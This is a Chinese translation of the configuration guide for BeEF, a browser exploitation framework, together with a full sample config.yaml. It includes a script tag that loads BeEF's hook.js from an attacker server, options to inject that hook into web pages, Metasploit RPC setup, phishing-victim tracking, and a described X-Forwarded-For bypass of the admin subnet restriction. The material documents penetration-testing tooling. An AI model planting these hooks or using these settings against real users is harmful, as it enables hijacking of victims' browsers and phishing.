BeEF中文文檔BeEF配置
介紹
BeEF利用YAML文件來配置核心功能以及擴展名。大多數核心BeEF配置位于主配置文件:中config.yaml,位于BeEF目錄中。
要配置擴展名,請修改config.yaml您要修改的擴展名文件夾中的文件。有關命令模塊配置文件的更多信息,請參見:命令模塊配置。
認證方式
證書
為了使用BeEF,您必須更改用戶名和密碼。
導航到BeEF目錄,然后使用您喜歡的文本編輯器(Vim,Nano等)進行編輯config.yaml。
請更新以下示例中顯示的部分:
#Credentials to authenticate in BeEF.
#Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "something unique and complex"存取控制
網絡限制
可以通過子網限制用于掛鉤或管理BeEF的Web界面。這是在
$ beef/config.yaml 在接口/ IP限制
$ beef/config.yaml.beef.restrictions.https可以通過子網限制用于管理BeEF的Web界面。
這可以在beef/config.yaml中完成。接口/ IP限制下的文件中完成此操作(beef/config.yaml.beef.restrictions.https)。
應該使用 permitted_ui_subnet 訪問控制來限制對管理界面的訪問。
例如:
restrictions:
permitted_hooking_subnet: ["10.1.0.0/16"]
permitted_ui_subnet: ["127.0.0.1/32"]可以繞過這些訪問限制,不應僅依賴這些訪問限制。
理想情況下,BeEF應該在反向代理后面運行,該反向代理會剝離用戶提供的代理標頭,例如X-Forwarded-For。本permitted_ui_subnet應僅限于127.0.0.1/32,并通過SSH隧道訪問。如果使用反向代理,則allow_reverse_proxy默認false需要更改為的配置設置true。這將使用X-Forwarded-For代理標頭中的IP地址來確定是否允許該請求訪問Admin UI。注意:如果此設置是true直接訪問用戶界面,或者反向代理無法剝離用戶提供的與路由相關的HTTP標頭(例如),則可以將IP地址欺騙到管理用戶界面X-Forwarded-For。
雖然不可能繞過/32訪問控制,但是可以繞過更寬松的訪問控制,例如/24或/16。在這些情況下,可以通過在X-Forwarded-For標頭中允許的范圍內提供有效的IP地址來繞過IP地址訪問控制。
例如,permitted_ui_subnet: ["10.1.1.1/24"]可以通過提供來繞過X-Forwarded-For: 10.1.1.123。
通過猜測正確子網中的有效IP地址,未經授權的用戶可以通過在活動中嘗試識別有效IP地址來推斷目標的IP地址permitted_hooking_subnet。或在permitted_ui_subnet不使用/32IP范圍的情況下訪問管理員界面。
管理界面
面板路徑也應使用beef.extension.admin_ui.base_path配置選項(即文件的“擴展”>“管理UI”小節)進行beef/config.yaml更改。
請注意,這此安全性并不會阻止對/api/REST接口的攻擊。
登錄限制
默認情況下,管理UI將登錄嘗試限制為每秒1次嘗試。可以通過更改中的beef.extensions.admin_ui.login_fail_delay值進行更改extensions/admin_ui/config.yaml。
默認情況下,REST API接口將登錄嘗試限制為每0.05秒進行1次嘗試。可以通過更改中的beef.restrictions.api_attempt_delay值進行更改config.yaml。
hook.js
動態生成的JavaScript hook文件hook.js將自動掛載在/hook.js中。
如果您的BeEF服務器是123.123.123.123:3000,則可以使用HTML腳本標記包括該腳本,如下所示:
<script src =“ http://123.123.123.123:3000/hook.js”> </ script>
Web服務器配置
可以完全配置Web服務器,這在config.yaml文件的HTTP小節中完成:
http:
debug: false # Will print verbose message in BeEF console
host: "0.0.0.0" # IP address of the web server
port: "3000" #Port of the web server
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
public: "8.7.6.5"
public_port: "3000"
dns: "localhost" # Address of DNS server
hook_file: "/hook.js" # Path for hooking script
hook_session_name: "BEEFHOOK" #Name of session
session_cookie_name: "BEEFSESSION" # Name of BeEF cookieweb服務器模仿
BeEF還具有基本的網絡服務器模仿功能。可以使用beef.http.web_server_imitation指令更改根頁面和HTTP 404錯誤頁面以反映幾種流行的Web服務器(Apache,IIS,NGINX)。
例如:
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page該hook_404和hook_root指令啟用后可分別注入對HTTP 404錯誤頁面的BeEF hook 和Web根頁面。這將連接所有檢查web服務器的瀏覽器。
配置擴展
啟用擴展
擴展應該在main中啟用config.yaml:
extension:
requester:
enable: true
proxy:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
evasion:
enable: false
console:
shell:
enable: false在使用BeEF時,應該通過在config.yaml中設置enable: false來禁用演示擴展。
Metasploit
要啟用Metasploit,您需要beef/config.yaml.beef.extensions.metasploit通過將值更改為true 來啟用它。
extension:
admin_ui:
metasploit:
enable: true應該通過修改其中的配置文件來配置Metasploit擴展extensions/metasploit/config.yml(請參見下文)beef/extensions/metasploit/config.yaml.beef.extensions.metasploit:
name: 'Metasploit'
enable: true
host: "127.0.0.1"
port: 55552
user: "msf"
pass: "<password>"
uri: '/api'
ssl: true
ssl_version: 'TLS1'
ssl_verify: true
callback_host: "127.0.0.1"
autopwn_url: "autopwn"請務必更改pass字段。
對Metasploit RPC服務的身份驗證訪問可用于在底層操作系統上執行任意命令。
除了host和callback_host參數之外,大多數配置都可以保留默認值,它們應該具有可以訪問Metasploit的主機的IP地址。
在下一步(在用戶和密碼信息之前)使用下面相同的主機。
要啟用RPC通信,需要在Metasploit中啟動以下命令:
load msgrpc ServerHost=127.0.0.1 User=msf Pass=<password> SSL=y這個命令可以寫入一個文件,并通過-r選項啟動到msfconsole。
通常在Metasploit終端中運行它更容易。使配置文件中的設置(host,user, pass 和ssl)與配置文件中的相同。
當然,IP地址和密碼應該與前面的YAML配置文件一致。
啟動BEEF
現在,您可以通過beef在根目錄中啟動腳本來啟動BeEF。
您還可以使用以下選項:
Usage: beef [options]
-x, --reset Reset the database
-v, --verbose Display debug information
-a, --ascii_art Prints BeEF ascii art
-c, --config FILE Load a different configuration file: if it's called custom-config.yaml, git automatically ignores it.
-p, --port PORT Change the default BeEF listening port
-w, --wsport WS_PORT Change the default BeEF WebSocket listening port附config.yanl內容:
#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.0.0-alpha-pre'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "" # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
推薦文章: